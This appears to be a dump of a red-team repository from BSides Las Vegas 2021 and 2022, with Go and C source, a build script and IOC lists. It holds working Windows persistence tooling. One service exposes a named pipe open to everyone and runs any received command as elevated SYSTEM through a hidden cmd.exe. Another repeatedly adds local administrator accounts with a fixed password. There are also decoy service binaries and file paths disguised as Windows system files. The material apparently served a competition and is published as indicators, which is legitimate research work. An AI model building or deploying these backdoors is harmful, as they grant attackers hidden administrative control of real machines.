(PSYSTEM_PROCESS_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 232 | if (d >= SIZE_LYRICS) { 233 | d = 0; 234 | } 235 | wcscpy_s(c->ImageName.Buffer, c->ImageName.Length, lyrics[d++]); 236 | n = c; 237 | continue; 238 | } 239 | return r; 240 | } 241 | -------------------------------------------------------------------------------- /BSidesLV-2021/privs/client.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "os" 7 | 8 | "github.com/iDigitalFlame/xmt/com/pipe" 9 | ) 10 | 11 | // client.go 12 | // Simple command line binary that connects to a named pipe and sends the args added. 13 | 14 | func main() { 15 | if len(os.Args) < 2 { 16 | os.Exit(0) 17 | } 18 | 19 | u, err := pipe.Dial(pipe.Format("")) 20 | if err != nil { 21 | os.Exit(1) 22 | } 23 | u.Write([]byte(os.Args[1])) 24 | u.Close() 25 | } 26 | -------------------------------------------------------------------------------- /BSidesLV-2021/privs/server.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "bytes" 7 | "io" 8 | "net" 9 | "strings" 10 | "sync" 11 | 12 | "github.com/iDigitalFlame/xmt/cmd" 13 | "github.com/iDigitalFlame/xmt/com/pipe" 14 | "github.com/iDigitalFlame/xmt/device/devtools" 15 | ) 16 | 17 | var bufs = sync.Pool{ 18 | New: func() interface{} { 19 | return new(bytes.Buffer) 20 | }, 21 | } 22 | 23 | // server.go 24 | // Hosts a named pipe as system that will run arbitrary commands passed to it. 25 | 26 | func main() { 27 | (&devtools.Service{Start: listen}).Run() 28 | } 29 | func listen() { 30 | l, err := pipe.ListenPerms(pipe.Format(""), pipe.PermEveryone) 31 | if err != nil { 32 | panic(err) 33 | } 34 | for { 35 | c, err := l.Accept() 36 | if err != nil { 37 | e, ok := err.(net.Error) 38 | if ok && e.Timeout() { 39 | continue 40 | } 41 | if ok && !e.Timeout() && !e.Temporary() { 42 | break 43 | } 44 | continue 45 | } 46 | b := bufs.Get().(*bytes.Buffer) 47 | io.Copy(b, c) 48 | c.Close() 49 | e := cmd.NewProcess("cmd.exe", "/c", strings.ReplaceAll(string(b.Bytes()), "\n", "")) 50 | b.Reset() 51 | // Fix a bug where cmd DOES NOT like the system working directory. 52 | e.Dir = "C:\\" 53 | bufs.Put(b) 54 | e.SetWindowDisplay(0) 55 | e.SetParent(cmd.F().SetElevated(true).SetSession(false)) 56 | e.Start() 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /BSidesLV-2021/user_add.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "strconv" 7 | "time" 8 | 9 | "github.com/iDigitalFlame/xmt/cmd" 10 | "github.com/iDigitalFlame/xmt/device/devtools" 11 | ) 12 | 13 | const userName = "JohnCena" 14 | 15 | // const userName = "MattDaemon" 16 | 17 | var count = 0 18 | 19 | // user_add.go 20 | // Fun thing, creates user accounts lol. 21 | 22 | func main() { 23 | (&devtools.Service{Exec: generate, Interval: time.Second * 30}).Run() 24 | } 25 | func generate() { 26 | p := cmd.NewProcess("cmd.exe", "/c", "net user "+userName+" "+strconv.Itoa(count)+" Password123 /add") 27 | p.Dir = "C:\\" 28 | p.SetParent(cmd.F().SetElevated(true)) 29 | p.SetWindowDisplay(0) 30 | p.Run() 31 | p = cmd.NewProcess("cmd.exe", "/c", "net localgroup Administrators "+userName+" "+strconv.Itoa(count)+" /add") 32 | // Fix a bug where cmd DOES NOT like the system working directory. 33 | p.Dir = "C:\\" 34 | p.SetParent(cmd.F().SetElevated(true)) 35 | p.SetWindowDisplay(0) 36 | p.Run() 37 | count++ 38 | } 39 | -------------------------------------------------------------------------------- /BSidesLV-2022/README.md: -------------------------------------------------------------------------------- 1 | # BSides Las Vegas 2022 2 | 3 | ## Overview 4 | 5 | C2: [ThunderStorm](https://github.com/iDigitalFlame/ThunderStorm) 6 | 7 | Tools/Tech Used 8 | 9 | - Userland Hooking 10 | - [UserAdd Service](https://github.com/iDigitalFlame/ThunderStorm/blob/main/jetstream/templates/user_add.go) 11 | - JetStream "user_add" generator 12 | - [Privexec/Elevate Service](https://github.com/iDigitalFlame/ThunderStorm/blob/main/jetstream/templates/elevate_server.go) 13 | - JetStream "elevate" generator (server and client) 14 | - Multiple Flurry implants 15 | - Multiple Bolt implants 16 | - PowerShell inline beacons 17 | 18 | ## IOC List 19 | 20 | - [Binaries](files.txt) 21 | - [Cache/Support](cache.txt) 22 | - [Webshell](webshell.asp) 23 | 24 | Support Binaries (your favorite Duck service)! are in the [Support/src](Support/src) 25 | folder. You can build these with the [build.sh](Support/build.sh) script 26 | _(Requires MinGW)_ 27 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/build.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | # Copyright (C) 2020 - 2022 iDigitalFlame 3 | # 4 | # This program is free software: you can redistribute it and/or modify 5 | # it under the terms of the GNU General Public License as published by 6 | # the Free Software Foundation, either version 3 of the License, or 7 | # any later version. 8 | # 9 | # This program is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | # GNU General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU General Public License 15 | # along with this program. If not, see . 16 | # 17 | 18 | mkdir bin 2> /dev/null 19 | 20 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/duck.rc -o /tmp/duck-64.o 21 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/goose.rc -o /tmp/goose-64.o 22 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/manifest.rc -o /tmp/manifest-64.o 23 | 24 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 25 | -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/duck-64.exe /tmp/duck-64.o /tmp/manifest-64.o src/duck.c 26 | 27 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 28 | -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/goose-64.exe /tmp/goose-64.o /tmp/manifest-64.o src/goose.c 29 | 30 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 31 | -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/nop-64.exe /tmp/manifest-64.o src/nop.c 32 | 33 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 34 | -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/nop-svc-64.exe /tmp/manifest-64.o src/nop_svc.c 35 | 36 | # i686-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/duck.rc -o /tmp/duck-32.o 37 | # i686-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/goose.rc -o /tmp/goose-32.o 38 | # i686-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/manifest.rc -o /tmp/manifest-32.o 39 | 40 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 41 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/duck-32.exe /tmp/duck-32.o /tmp/manifest-32.o src/duck.c 42 | 43 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 44 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/goose-32.exe /tmp/goose-32.o /tmp/manifest-32.o src/goose.c 45 | 46 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 47 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/goose-32.exe /tmp/goose-32.o /tmp/manifest-32.o src/goose.c 48 | 49 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 50 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/nop-32.exe /tmp/manifest-32.o src/nop.c 51 | 52 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 53 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/nop-svc-32.exe /tmp/manifest-32.o src/nop_svc.c 54 | 55 | # rm /tmp/duck-32.o 56 | # rm /tmp/duck-64.o 57 | # rm /tmp/goose-32.o 58 | # rm /tmp/goose-64.o 59 | # rm /tmp/manifest-64.o 60 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/duck.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | 57 | HANDLE stopDuck; 58 | SERVICE_STATUS_HANDLE duck; 59 | 60 | void WINAPI DuckQuack(DWORD); 61 | void WINAPI DuckService(DWORD, LPWSTR*); 62 | 63 | int main(int argc, char *argv[]) { 64 | if (argc > 1) { 65 | SERVICE_TABLE_ENTRYW t[] = {{L"", &DuckService}, {NULL, NULL}}; 66 | StartServiceCtrlDispatcherW(t); 67 | return 0; 68 | } 69 | STARTUPINFOW s; 70 | PROCESS_INFORMATION i; 71 | memset(&i, 0, sizeof(i)); 72 | memset(&s, 0, sizeof(s)); 73 | s.cb = sizeof(STARTUPINFOW); 74 | if (!CreateProcessW(L"goose.exe", L"C:\\Windows\\System32\\goose.exe", NULL, NULL, TRUE, 0, NULL, NULL, &s, &i)) { 75 | return 1; 76 | } 77 | WaitForSingleObject(i.hProcess, INFINITE); 78 | CloseHandle(i.hThread); 79 | CloseHandle(i.hProcess); 80 | return 0; 81 | } 82 | 83 | DWORD WINAPI DuckQuacker(DWORD c, DWORD v, void *d, void *x) { 84 | switch(c) { 85 | case SERVICE_CONTROL_STOP: 86 | case SERVICE_CONTROL_SHUTDOWN: 87 | DuckQuack(0x3); 88 | SetEvent(stopDuck); 89 | break; 90 | default: 91 | DuckQuack(0x4); 92 | break; 93 | } 94 | return 0; 95 | } 96 | 97 | void WINAPI DuckQuack(DWORD s) { 98 | SERVICE_STATUS v = {0x10, s, 0x5, 0, 0, 0, 0}; 99 | SetServiceStatus(duck, &v); 100 | } 101 | void WINAPI DuckService(DWORD argc, LPWSTR *argv) { 102 | duck = RegisterServiceCtrlHandlerExW(L"DuckService", &DuckQuacker, NULL); 103 | DuckQuack(0x2); 104 | stopDuck = CreateEventW(NULL, TRUE, FALSE, NULL); 105 | DuckQuack(0x4); 106 | WCHAR v[MAX_PATH]; 107 | int n = GetModuleFileNameW(NULL, (LPWSTR)v, MAX_PATH); 108 | if (n == 0) { 109 | CloseHandle(stopDuck); 110 | DuckQuack(0x1); 111 | return; 112 | } 113 | STARTUPINFOW s; 114 | PROCESS_INFORMATION i; 115 | memset(&i, 0, sizeof(i)); 116 | memset(&s, 0, sizeof(s)); 117 | s.cb = sizeof(STARTUPINFOW); 118 | if (!CreateProcessW(v, v, NULL, NULL, TRUE, 0, NULL, NULL, &s, &i)) { 119 | CloseHandle(stopDuck); 120 | DuckQuack(0x1); 121 | return; 122 | } 123 | WaitForSingleObject(stopDuck, INFINITE); 124 | TerminateProcess(i.hProcess, 0); 125 | CloseHandle(i.hThread); 126 | CloseHandle(i.hProcess); 127 | DuckQuack(0x3); 128 | CloseHandle(stopDuck); 129 | DuckQuack(0x1); 130 | } 131 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/duck.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | VS_VERSION_INFO VERSIONINFO 20 | FILEVERSION 1,2,3,4 21 | PRODUCTVERSION 1,2,3,4 22 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 23 | FILEFLAGS 0 24 | FILEOS VOS__WINDOWS32 25 | FILETYPE VFT_DLL 26 | FILESUBTYPE VFT2_UNKNOWN 27 | 28 | BEGIN 29 | BLOCK "StringFileInfo" 30 | BEGIN 31 | BLOCK "040904B0" 32 | BEGIN 33 | VALUE "Comments", "*quack*" 34 | VALUE "CompanyName", "Duck Co!" 35 | VALUE "FileDescription", "Uhhh... I'm a duck!" 36 | VALUE "FileVersion", "1.2.3.4" 37 | VALUE "InternalName", "Duck!" 38 | VALUE "LegalCopyright", "Copyright 2022 any Lakes" 39 | VALUE "OriginalFilename", "duck.exe" 40 | VALUE "ProductName", "Duck Duck Goose!" 41 | VALUE "ProductVersion", "1.2.3.4" 42 | END 43 | END 44 | BLOCK "VarFileInfo" 45 | BEGIN 46 | VALUE "Translation", 0x409, 1200 47 | END 48 | END -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/goose.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | 57 | int main(int argc, char *argv[]) { 58 | SleepEx(INFINITE, TRUE); 59 | } 60 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/goose.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | VS_VERSION_INFO VERSIONINFO 20 | FILEVERSION 1,2,3,4 21 | PRODUCTVERSION 1,2,3,4 22 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 23 | FILEFLAGS 0 24 | FILEOS VOS__WINDOWS32 25 | FILETYPE VFT_DLL 26 | FILESUBTYPE VFT2_UNKNOWN 27 | 28 | BEGIN 29 | BLOCK "StringFileInfo" 30 | BEGIN 31 | BLOCK "040904B0" 32 | BEGIN 33 | VALUE "Comments", "*stares in goose*" 34 | VALUE "CompanyName", "Duck Co!" 35 | VALUE "FileDescription", "Peace was never an option" 36 | VALUE "FileVersion", "1.2.3.4" 37 | VALUE "InternalName", "Goose!" 38 | VALUE "LegalCopyright", "Copyright 2022 any Lakes" 39 | VALUE "OriginalFilename", "goose.exe" 40 | VALUE "ProductName", "Hajonk" 41 | VALUE "ProductVersion", "1.2.3.4" 42 | END 43 | END 44 | BLOCK "VarFileInfo" 45 | BEGIN 46 | VALUE "Translation", 0x409, 1200 47 | END 48 | END -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/manifest.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include "winuser.h" 18 | 1 RT_MANIFEST manifest.xml 19 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/manifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/nop.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | 57 | int main(int argc, char *argv[]) { 58 | SleepEx(INFINITE, TRUE); 59 | } 60 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/nop_svc.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | 57 | HANDLE runPLz; 58 | SERVICE_STATUS_HANDLE run; 59 | 60 | void WINAPI UpdateState(DWORD); 61 | void WINAPI DuckService(DWORD, LPWSTR*); 62 | 63 | int main(int argc, char *argv[]) { 64 | SERVICE_TABLE_ENTRYW t[] = {{L"", &DuckService}, {NULL, NULL}}; 65 | StartServiceCtrlDispatcherW(t); 66 | return 0; 67 | } 68 | 69 | DWORD WINAPI ServiceManager(DWORD c, DWORD v, void *d, void *x) { 70 | switch(c) { 71 | case SERVICE_CONTROL_STOP: 72 | case SERVICE_CONTROL_SHUTDOWN: 73 | UpdateState(0x3); 74 | SetEvent(runPLz); 75 | break; 76 | default: 77 | UpdateState(0x4); 78 | break; 79 | } 80 | return 0; 81 | } 82 | 83 | void WINAPI UpdateState(DWORD s) { 84 | SERVICE_STATUS v = {0x10, s, 0x5, 0, 0, 0, 0}; 85 | SetServiceStatus(run, &v); 86 | } 87 | void WINAPI DuckService(DWORD argc, LPWSTR *argv) { 88 | run = RegisterServiceCtrlHandlerExW(L"", &ServiceManager, NULL); 89 | UpdateState(0x2); 90 | runPLz = CreateEventW(NULL, TRUE, FALSE, NULL); 91 | UpdateState(0x4); 92 | WaitForSingleObject(runPLz, INFINITE); 93 | UpdateState(0x3); 94 | CloseHandle(runPLz); 95 | UpdateState(0x1); 96 | } 97 | -------------------------------------------------------------------------------- /BSidesLV-2022/cache.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\Inf\MSDTC\vbscript.h 2 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data.OracleClient\v4.0_4.0.0.0__b77a5c561934e089\System.Data.OracleCluunt.dll 3 | C:\Windows\SysWOW64\Speech\Common\amdxata.dll 4 | C:\Windows\SysWOW64\zh-HK\nms.dll.mui 5 | C:\Windows\Boot\PCAT\en-GB\bootmfr.exe.mui 6 | C:\Program Files (x86)\Internet Explorer\IEShiws.exe 7 | C:\Windows\System32\zh-CN\WWOHost.exe.mui 8 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_6.3.0.0__31bf3856ad364e35\stexstor.dll 9 | C:\Windows\Boot\PCAT\en-GB\ceipdata.mui 10 | C:\Windows\Boot\EFI\lt-LT\bootmgn.efi.mui 11 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.VolumeActivation.Plugin.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\Microsoft.Windows.VolumeActivation.Plugon.Resourceo.dll 12 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\cht4vx64.dll 13 | C:\Windows\Boot\EFI\sr-Latn-RS\bootmgvw.efi.mui 14 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Buicd.Utilities.v4.wsa 15 | C:\Windows\Microsoft.NET\assembly\GAC_64\blbproxy\v4.0_6.3.0.0__31bf3856ad364e35\rasauto.dll 16 | C:\Windows\SysWOW64\Windows.Networking.BackgroundBransfer.xsl 17 | C:\Windows\Inf\.NET Data Provider for Oracle\0000\ndistapi.ini 18 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\blbmmc.resources\v4.0_6.3.0.0_en_31bf3856ad364e35\diskperf.dll 19 | C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\msrd3x40.dll 20 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\Sysqem.Web.dll 21 | C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.GroupPolicy.AdmTmplEditor\v4.0_6.3.0.0__31bf3856ad364e35\ETWESEProviderResources.dll 22 | C:\Windows\ToastData\Windows.SystemToask.RasToastNotifier.lnk 23 | C:\Windows\en-US\ragedit.exe.bin 24 | C:\Windows\ADFS\zh-HANT\icacls.dll 25 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speach.dll 26 | C:\Windows\Boot\EFI\sr-Latn-CS\boutmgfw.efi.mui 27 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.SDHost\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDHoPt.dll 28 | C:\Windows\SysWOW64\fi-FI\nms.dll.mui 29 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.FederationServices.ServerManager\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.FederotionServices.ServerManager.dll 30 | C:\Windows\System32\BestPractices\v1.0\Models\Microsoft\Windows\DHCPServer\DHCPServen.ps1 31 | C:\Windows\SysWOW64\Speech\SpeechUX\qapi.cpl 32 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\v4.0_6.3.0.0__31bf3856ad364e35\svrmgrnc.dll 33 | C:\Program Files (x86)\Common Files\System\Ole DB\en-US\sqloxedb.rll.mui 34 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_th_31bf3856ad364e35\networkinspection.dll 35 | C:\Program Files\Windows NT\Accessories\wardpad.dll 36 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\WUDFUsbccidDriver.dll 37 | C:\Windows\System32\it-IT\mleng.dll.mui 38 | C:\Windows\SysWOW64\InstallShield\setupdir\0003\prnepcl2.dll 39 | C:\Windows\System32\LogFiles\AIT\AitEvenkLog.etl.001 40 | C:\Program Files (x86)\Internet Explorer\SIGNUP\instald.ins 41 | -------------------------------------------------------------------------------- /BSidesLV-2022/files.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\System32\dsc\DscCofeR.exe 2 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Numerics\v4.0_4.0.0.0__b03f5f7f11d50a3a\peverify.dll 3 | C:\Program Files (x86)\Common Files\System\Ole DB\KBDGR1.exe 4 | C:\Windows\ADFS\ro\bfadfcoe.exe 5 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.ServerManager.NPASRole.Plugin\v4.0_6.3.0.0__31bf3856ad364e35\prm0008.exe 6 | 